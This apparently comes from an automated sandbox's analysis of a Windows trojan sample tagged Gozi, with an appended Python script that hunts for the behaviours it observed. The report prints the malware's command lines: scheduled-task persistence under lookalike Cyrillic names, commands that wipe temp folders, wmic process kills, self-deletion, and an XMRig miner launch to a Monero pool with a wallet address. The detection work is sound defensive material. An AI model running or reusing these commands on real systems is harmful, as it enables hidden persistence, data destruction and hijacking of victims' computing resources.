Analysis Overview
SHA256
7ae4237b70f7233f779dbcde9db944e13472a1c4097baa4a17f5e769e0869476
Threat Level: Known bad
The file SecuriteInfo.com.Trojan.Siggen17.24708.25098.10939 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks computer location settings
Checks BIOS information in registry
Checks whether UAC is enabled
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Runs ping.exe
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Kills process with WMI
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-21 20:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-21 20:22
Reported
2022-03-21 20:24
Platform
win7-20220311-en
Max time kernel
4294183s
Max time network
125s
Command Line
Signatures
Gozi, Gozi IFSB
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %temp% /f /s /q
C:\Windows\system32\cmd.exe
"cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "Win32WebViewHost.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 1
Network
Files
memory/1876-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmp
\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
memory/2004-58-0x000000003F2C0000-0x000000003F2CE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Wm0PrvSE.e_
| MD5 | b61ae72b50a40197085687a8df2c4f32 |
| SHA1 | ccc71c89853966f7001c6ea43287d9c396884bc6 |
| SHA256 | a262c8414eafbd3587c395b4a6b08ba010efcb4681c1759396386de7d223a50b |
| SHA512 | 83ce36d6bf70f2afc0bb07f403f797e2b3207501fe67a94ae69c5ae8f2530f8bd31fea6b8ad5c1f97fcff046818f2adfd1b16ed2ab89a601d15bb4162bc7c1ae |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runt0meBroker.e_
| MD5 | 9566c78215179132d7ad6b1c1b565b46 |
| SHA1 | 35fdcb1e7b0dcde4f911517bb53035b9756d9814 |
| SHA256 | f48ef29dad391063386c2e8e324751c04e131f214f5e3b43ee38b0581243879b |
| SHA512 | 5cfe60e44656dfee596b90f7fbb8633c8f88e105f17c5cfbce92a01306c4e1d996a02b288e283cfaf3d8b3440685ca5ec7d8b6999463dca64e8262228ef912c7 |
memory/2004-61-0x000007FEF4F80000-0x000007FEF596C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-21 20:22
Reported
2022-03-21 20:24
Platform
win10v2004-en-20220113
Max time kernel
72s
Max time network
118s
Command Line
Signatures
Gozi, Gozi IFSB
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Executes dropped EXE
Checks BIOS information in registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe | N/A |
Drops file in System32 directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\System32\cleanmgr.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 | C:\Windows\System32\cleanmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Kills process with WMI
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "WmіPrvSE" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe" /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "RuntіmeBroker" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe" /f
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "WmіPrvSE.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\" & ping -n 4 127.0.0.1 & erase %temp% /s /f /q
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"
C:\Windows\system32\PING.EXE
ping -n 1 127.0.0.1
C:\Windows\system32\PING.EXE
ping -n 1 127.0.0.1
C:\Windows\system32\xcopy.exe
xcopy /h /r /y /z /c /i "RuntіmeBroker.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"
C:\Windows\system32\xcopy.exe
xcopy /h /r /y /z /c /i "WmіPrvSE.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\"
C:\Windows\system32\PING.EXE
ping -n 4 127.0.0.1
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmіPrvSE.exe
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntіmeBroker.exe
C:\Windows\System32\cleanmgr.exe
"C:\Windows\System32\cleanmgr.exe" /setup
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe {F243B500-D086-4018-A5D7-26A3B538A770}
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
C:\Windows\system32\cmd.exe
"cmd.exe" /C ping -n 2 127.0.0.1>%temp%\log2 && rd /s /q %appdata%\Sysfiles & rd /s /q %temp%
C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
C:\Windows\System32\Wbem\WMIC.exe
wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & ping -n 10 127.0.0.1>%temp%\log1 && erase %temp% /s /f /q & rd /s /q %appdata%\Sysfiles
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
C:\Windows\System32\Wbem\WMIC.exe
wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
C:\Windows\system32\PING.EXE
ping -n 10 127.0.0.1
C:\Windows\System32\Wbem\WMIC.exe
wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
C:\Windows\System32\Wbem\WMIC.exe
wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe
"C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe" -o gulf.moneroocean.stream:20128 -u 46vJx3eY8qKgUN5cPxr81MjnNASPRxpp7fDKWXPYp93Fj6zhGPRLR7BM6FNQNGgTK6R5Pz3V55bvn5jLMmu6VWuJQcMk3ZL -p x -k -v=0 --cpu-no-yield --randomx-cache-qos --tls -t 1
Network
| Country | Destination | Domain | Proto |
| NL | 104.110.191.133:80 | | tcp |
| NL | 104.110.191.133:80 | | tcp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 199.247.0.216:20128 | gulf.moneroocean.stream | tcp |
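The process tree and network table above show the chain end to end: the IExpress/WExtract self-extractor unpacks into IXP000.TMP and registers its own cleanup under RunOnce, xcopy stages two executables whose names use Cyrillic і (U+0456) in place of Latin i so that they read as WmiPrvSE.exe and RuntimeBroker.exe, schtasks re-launches each of them every minute from an app-package LocalState folder, HxTsr.exe runs with XMRig options (--cpu-no-yield, --randomx-cache-qos, --tls, -k) against the gulf.moneroocean.stream pool on port 20128, and cmd/wmic one-liners erase the staging directories and terminate anything still running from %TEMP%; the behavioral1 tree ends with the choice-delay-then-Del self-deletion of the dropper. The Python below is an added example, not part of this report or of the sample, that turns those behaviours into checks a responder can run over process-creation command lines (Sysmon event 1 or EDR telemetry). Its sample input is the command lines listed above, the confusables table is a hand-picked subset rather than a full Unicode mapping, and the wallet rule (95 base58 characters beginning with 4 or 8) is the Monero address format used as a heuristic, not a lookup of this specific wallet.

```python
"""Triage checks over the command lines in the process trees above.

Added example, not part of the sandbox report. Each check encodes one
behaviour the report shows; run it over Sysmon event 1 / EDR command lines.
The confusables table is a hand-picked subset, not a full Unicode mapping.
"""
import re

CYR_I = "\u0456"  # Cyrillic small letter i (U+0456); renders like Latin "i"

# Command lines copied from the report's process lists (GUID braces are
# doubled inside the f-strings). The last entry is benign noise from the tree.
SAMPLE_CMDLINES = [
    rf'"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Wm{CYR_I}PrvSE" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{{1edeee53-0afe-4609-b846-dbc1b2015b1a}}\Wm{CYR_I}PrvSE.exe" /f',
    rf'C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}}\Runt{CYR_I}meBroker.exe',
    r'"C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe" -o gulf.moneroocean.stream:20128 -u 46vJx3eY8qKgUN5cPxr81MjnNASPRxpp7fDKWXPYp93Fj6zhGPRLR7BM6FNQNGgTK6R5Pz3V55bvn5jLMmu6VWuJQcMk3ZL -p x -k -v=0 --cpu-no-yield --randomx-cache-qos --tls -t 1',
    r"wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate",
    r'"cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "Win32WebViewHost.exe"',
    r'"C:\Windows\System32\cleanmgr.exe" /setup',
]

CONFUSABLES = {  # Cyrillic letters commonly substituted for Latin ones
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",
}
EXE_PATH_RE = re.compile(r'[A-Za-z]:\\[^"]+?\.exe')
POOL_RE = re.compile(r"(?:^|\s)-o\s+([\w.-]+):(\d+)")
# Monero addresses: 95 base58 characters starting with 4 (primary) or 8 (sub)
WALLET_RE = re.compile(r"(?:^|\s)-u\s+([48][1-9A-HJ-NP-Za-km-z]{94})(?=\s|$)")
XMRIG_FLAGS = ("--tls", "-k", "--cpu-no-yield", "--randomx-cache-qos")
WMIC_KILL_RE = re.compile(
    r"wmic\s+process\s+where\s+'[^']*like\s+'([^']+)''\s+(call\s+terminate|delete)", re.I)
SELF_DELETE_RE = re.compile(
    r"choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+(\d+)\s*&\s*del\s+\"?([^\"\s]+)", re.I)


def homoglyph_images(cmdline):
    """Every .exe path whose file name is not pure ASCII, with its lookalike."""
    hits = []
    for path in EXE_PATH_RE.findall(cmdline):
        name = path.rsplit("\\", 1)[-1]
        if not name.isascii():
            hits.append({"image": name,
                         "lookalike": "".join(CONFUSABLES.get(c, c) for c in name)})
    return hits


def risky_schtask(cmdline):
    """schtasks /create on a MINUTE schedule (<= 5) whose action is in a user profile."""
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    sc = re.search(r"/sc\s+(\w+)", cmdline, re.I)
    mo = re.search(r"/mo\s+(\d+)", cmdline, re.I)
    tr = re.search(r'/tr\s+"([^"]+)"', cmdline, re.I)
    if not (sc and tr):
        return None
    every = int(mo.group(1)) if mo else 1  # schtasks defaults /mo to 1
    target = tr.group(1)
    if sc.group(1).upper() == "MINUTE" and every <= 5 and target.lower().startswith("c:\\users\\"):
        return {"every_minutes": every, "target": target}
    return None


def miner_indicators(cmdline):
    """Pool, wallet and XMRig-specific flags, or None without a pool+wallet pair."""
    pool, wallet = POOL_RE.search(cmdline), WALLET_RE.search(cmdline)
    if not (pool and wallet):
        return None
    flags = [f for f in XMRIG_FLAGS
             if re.search(r"(?:^|\s)" + re.escape(f) + r"(?=\s|=|$)", cmdline)]
    return {"pool": pool.group(1), "port": int(pool.group(2)),
            "wallet": wallet.group(1), "xmrig_flags": flags}


def wmic_kill(cmdline):
    """wmic PROCESS WHERE ... call terminate / delete, with the LIKE pattern used."""
    m = WMIC_KILL_RE.search(cmdline)
    return {"like": m.group(1), "verb": m.group(2).lower()} if m else None


def self_delete(cmdline):
    """choice-based delay followed by Del of a file: dropper self-deletion."""
    m = SELF_DELETE_RE.search(cmdline)
    return {"delay_s": int(m.group(1)), "file": m.group(2)} if m else None


def triage(cmdlines):
    """Return (kind, detail) findings for a list of process command lines."""
    findings = []
    for c in cmdlines:
        findings += [("masquerade_homoglyph", h) for h in homoglyph_images(c)]
        for kind, check in (("persistence_schtasks", risky_schtask),
                            ("coinminer_xmrig", miner_indicators),
                            ("defense_evasion_wmic", wmic_kill),
                            ("self_delete_choice", self_delete)):
            result = check(c)
            if result:
                findings.append((kind, result))
    return findings


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_CMDLINES):
        print(f"{kind}: {detail}")
```

The homoglyph check is the one worth promoting to a standing hunt: a process image name under \AppData\Local\Packages\*\LocalState\ should never contain non-ASCII characters, and the genuine WmiPrvSE.exe (System32\wbem) and RuntimeBroker.exe (System32) never run from a user profile. The schtasks and wmic checks are noisier on their own and are best used to corroborate a homoglyph or miner hit from the same process tree.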
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
memory/1460-132-0x0000000000540000-0x000000000054E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runt0meBroker.e_
| MD5 | 9566c78215179132d7ad6b1c1b565b46 |
| SHA1 | 35fdcb1e7b0dcde4f911517bb53035b9756d9814 |
| SHA256 | f48ef29dad391063386c2e8e324751c04e131f214f5e3b43ee38b0581243879b |
| SHA512 | 5cfe60e44656dfee596b90f7fbb8633c8f88e105f17c5cfbce92a01306c4e1d996a02b288e283cfaf3d8b3440685ca5ec7d8b6999463dca64e8262228ef912c7 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Wm0PrvSE.e_
| MD5 | b61ae72b50a40197085687a8df2c4f32 |
| SHA1 | ccc71c89853966f7001c6ea43287d9c396884bc6 |
| SHA256 | a262c8414eafbd3587c395b4a6b08ba010efcb4681c1759396386de7d223a50b |
| SHA512 | 83ce36d6bf70f2afc0bb07f403f797e2b3207501fe67a94ae69c5ae8f2530f8bd31fea6b8ad5c1f97fcff046818f2adfd1b16ed2ab89a601d15bb4162bc7c1ae |
